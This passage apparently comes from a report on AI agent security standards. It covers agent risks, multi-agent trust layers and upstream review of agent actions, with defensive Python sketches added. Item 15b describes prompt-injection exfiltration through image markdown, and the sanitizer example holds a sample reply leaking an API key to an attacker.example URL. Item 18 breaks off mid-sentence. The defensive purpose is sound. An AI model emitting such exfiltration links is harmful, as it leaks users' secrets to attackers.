
AI Standards for Global Impact: From Governance to Action



                   13)  Among China’s AI agent security initiatives, the Ministry of Industry and Information
                        Technology’s Technical Committee on AI (MIIT/TC1) has launched a standards project
                        on general security requirements for AI agents, and the China Academy of Information
                        and Communications Technology (CAICT) has built a comprehensive Trusted Agent
                        Testbed supporting four major testing scenarios: protocol verification testing, benchmark
                        testing, collaborative testing, and security testing. The testbed aims to advance
                        standardization, lower testing costs, and improve coordination efficiency.
                  14)  While agents demonstrate remarkable strengths in goal-driven planning, adaptive
                       learning, and collaborative work, these three features may unleash unforeseen risks. First,
                       agents optimize for goals but lack human ethics/context, potentially leading to unintended
                       consequences (e.g. a smart home agent shuts off the refrigerator to save energy, ignoring
                       food preservation). Second, agents evolve with new data in unpredictable ways (e.g. a
                       companion agent disobeys rules to get candy for a user, prioritizing immediate requests
                       over parental instructions). Third, multi-agent systems interact in unforeseen patterns,
                       causing systemic chaos (e.g. traffic light agents and self-driving cars pursue conflicting
                        goals, worsening congestion).
                   15)  Trust risks arise in multi-agent AI systems across three layers:

                        a)  At the single-agent autonomy layer, risks involve excessive independence (e.g. an
                           automated welfare scheme’s overreach in recovering overpayments) and unauthorized
                           actions.
                        b)  At the tool/MCP connectivity layer, systems face adversarial attacks (e.g. the Dolphin
                           Attack hijacking voice-controlled AI via inaudible signals) and data exposure (e.g.
                           prompt injection exfiltrating data through image markdown; a toy mitigation is
                           sketched after this list).
                        c)  At the multi-agent collaboration layer, threats include identity spoofing (e.g.
                           malicious drones posing as legitimate swarm members) and goal hijacking (e.g.
                           man-in-the-middle attacks on cobots to prioritize speed over quality).
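
                        The image-markdown exfiltration channel in item 15b can be illustrated with a small
                        defensive sketch in Python. This is an illustrative mitigation, not a technique named
                        in the source: it allowlists image hosts in model output before rendering, so an
                        injected prompt cannot smuggle data out through attacker-controlled image URLs. The
                        regex, allowlist, and function names are assumptions.

        import re
        from urllib.parse import urlparse

        # Hypothetical allowlist: only images from this trusted host may render.
        ALLOWED_IMAGE_HOSTS = {"assets.example.com"}

        # Matches markdown images of the form ![alt](url).
        IMG = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")

        def sanitize_markdown(text: str) -> str:
            """Drop image links whose host is not allowlisted, closing the channel
            where injected prompts exfiltrate data via attacker-controlled URLs."""
            def check(match: re.Match) -> str:
                host = urlparse(match.group(1)).hostname or ""
                return match.group(0) if host in ALLOWED_IMAGE_HOSTS else "[image removed]"
            return IMG.sub(check, text)

        # A prompt-injected reply trying to leak a secret in the image URL:
        leaky = "Done! ![pixel](https://attacker.example/log?stolen=API_KEY)"
        print(sanitize_markdown(leaky))  # -> Done! [image removed]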

                   16)  Security standardization for multi-agent governance should start with the single agent
                        and consider three levels: technical, governance, and ecosystem. In terms of the trust
                        ecosystem, decentralized identity and consensus mechanisms can be used to build
                        trust-by-design collaboration foundations (a toy identity check is sketched after this
                        item). In terms of governance, there is potential to adopt human-machine collaboration,
                        referencing frameworks like the NIST AI RMF and ISO/IEC 42001 to manage dynamic
                        risks. In terms of technology, end-to-end security can be applied across the agent
                        lifecycle, aligning with policies (e.g. China’s AI content rules) and industry efforts
                        (e.g. Ant Group’s runtime security work).
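
                        As a concrete illustration of the trust-ecosystem level, the sketch below shows a
                        receiver verifying a sender’s claimed identity against a key registry before accepting
                        a collaboration message, addressing the swarm-spoofing risk in item 15c. A real
                        decentralized-identity scheme would use DIDs and asymmetric signatures; standard-
                        library HMAC with pre-registered keys stands in here so the example runs without
                        dependencies, and all names are illustrative.

        import hashlib
        import hmac
        import os

        # Toy registry: agent id -> registered key. In a decentralized-identity
        # scheme this would be a DID document holding a public key instead.
        REGISTRY = {
            "drone-7": os.urandom(32),
            "drone-9": os.urandom(32),
        }

        def sign(agent_id: str, key: bytes, payload: bytes) -> bytes:
            """Sender authenticates its message under its registered key."""
            return hmac.new(key, agent_id.encode() + payload, hashlib.sha256).digest()

        def admit(agent_id: str, payload: bytes, tag: bytes) -> bool:
            """Receiver checks the claimed identity before treating the sender
            as a legitimate swarm member (cf. the spoofed-drone risk in 15c)."""
            key = REGISTRY.get(agent_id)
            if key is None:
                return False  # unknown agent: reject outright
            expected = hmac.new(key, agent_id.encode() + payload, hashlib.sha256).digest()
            return hmac.compare_digest(expected, tag)

        msg = b"formation: hold position"
        tag = sign("drone-7", REGISTRY["drone-7"], msg)
        assert admit("drone-7", msg, tag)                  # legitimate member admitted
        assert not admit("drone-7", msg, os.urandom(32))   # spoofed identity rejected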
                  17)  We are currently on track for a “crisis of review”, since agents cannot be trusted to review
                        their own or other agents’ output or behaviours.

                       o  AI outputs are cheaper and faster than the human equivalent, but for important outputs
                          there is always going to be a human who is responsible for the outcome (e.g. a job
                          interviewer, corporate officer/signatory, board member, regulator). That person will
                           either be overwhelmed by outputs and become a bottleneck or will simply give
                           rubber-stamp approval (or be outcompeted by someone who does).
                       o  The solution could be to move the review upstream of the action, expressing all the
                          constraints.

                   18)  This could be specifically solved with: (a) a separable, auditable model of the relevant
                       system in which the agent acts, (b) a way of expressing safe or approved behaviour,
                       grounded within the context of the model, and (c) a requirement that the agent provide
                       evidence that its actions are compliant with the definition of safe within the scope of the
                       model.
                        o  Combined, these three pieces become a meta-level requirement that gives a standard
                           for communicating constraints (a minimal sketch follows this item).
                       o  This is actually a generalization of how safety is tested in other engineering domains,
                          like civil engineering or pharmaceuticals. The {model, safety criteria, evidence} for
                          civil engineering are things like {physics models, load limits, design files+reports} and
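
                        The {model, safety criteria, evidence} triple can be made concrete with a minimal
                        Python sketch: an upstream reviewer approves an action only if the agent supplies
                        evidence that every criterion, evaluated against the system model, holds. The
                        smart-home model, class names, and criterion below are illustrative assumptions
                        (reusing the refrigerator example from item 14), not part of any published standard.

        from dataclasses import dataclass
        from typing import Callable

        @dataclass(frozen=True)
        class Action:
            verb: str     # e.g. "power_off"
            target: str   # appliance name

        @dataclass(frozen=True)
        class SystemModel:
            # (a) A separable, auditable model of the system the agent acts in:
            # here, a smart home tracking which appliances are critical.
            appliances: dict

        @dataclass(frozen=True)
        class SafetyCriterion:
            # (b) Approved behaviour, expressed against the model rather than the agent.
            description: str
            holds: Callable[[SystemModel, Action], bool]

        @dataclass(frozen=True)
        class Evidence:
            # (c) The agent's claim that its action satisfies each criterion.
            action: Action
            checked_criteria: tuple

        def upstream_review(model, criteria, evidence):
            # Review happens *before* the action: approve only if every criterion
            # is cited in the evidence and actually holds in the model.
            for c in criteria:
                if c.description not in evidence.checked_criteria:
                    return False   # agent skipped a constraint
                if not c.holds(model, evidence.action):
                    return False   # claimed compliance does not hold
            return True

        # Smart-home example mirroring item 14's refrigerator scenario.
        home = SystemModel(appliances={
            "refrigerator": {"critical": True},   # food preservation
            "hallway_lamp": {"critical": False},
        })
        criteria = [SafetyCriterion(
            "never power off critical appliances",
            lambda m, a: not (a.verb == "power_off" and m.appliances[a.target]["critical"]),
        )]

        bad = Evidence(Action("power_off", "refrigerator"),
                       checked_criteria=("never power off critical appliances",))
        ok = Evidence(Action("power_off", "hallway_lamp"),
                      checked_criteria=("never power off critical appliances",))

        assert not upstream_review(home, criteria, bad)   # blocked before acting
        assert upstream_review(home, criteria, ok)        # compliant action allowed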


